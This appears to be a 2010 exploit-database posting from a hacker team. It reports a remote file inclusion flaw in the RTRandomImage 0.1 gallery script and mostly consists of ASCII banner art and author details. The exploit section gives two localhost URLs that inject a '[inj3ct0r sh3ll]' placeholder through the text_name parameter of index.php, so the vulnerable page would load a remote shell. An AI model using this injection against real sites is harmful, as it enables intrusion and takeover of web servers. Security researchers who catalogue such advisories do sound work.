RTRandomImage - Remote File Inclusion



EKU-ID: 20353 CVE: OSVDB-ID:
Author: Sn!pEr.S!Te Hacker Published: 2010-06-06 Verified: Not Verified
Download:

Rating

¡î¡î¡î¡î¡î
Home


|| || | ||
 o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
 ( : / (_) / (
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ########################################          1
0                    I'm Sn!pEr.S!Te member from Inj3ct0r Team          1
1                    ########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ------------------------------------------------------------
# Remote File Inclusion Vulnerability
# -----------------------------------------------------------

RTRandomImage <==0.1  (index.php)

--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker #
# [+] Email : sniper-site@HoTMaiL.coM #
# [+] Inj3ct0r Team Hacker #
# [+] 5-6-2010 #
# [+] Script : Image Galleries » RTRandomImage#
# [+]Version: [0.1] #
# [+] Download:http://www.toldo.info/roberto/files/RTRandomimage.zip
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=
 -=[ exploit ]=-

http://localhost/RTRandomimage/index.php?text_name=[inj3ct0r sh3ll]


http://127.0.0.1/RTRandomimage/index.php?text_name=[inj3ct0r sh3ll]


=========================| -=[ THE END]=- |=========================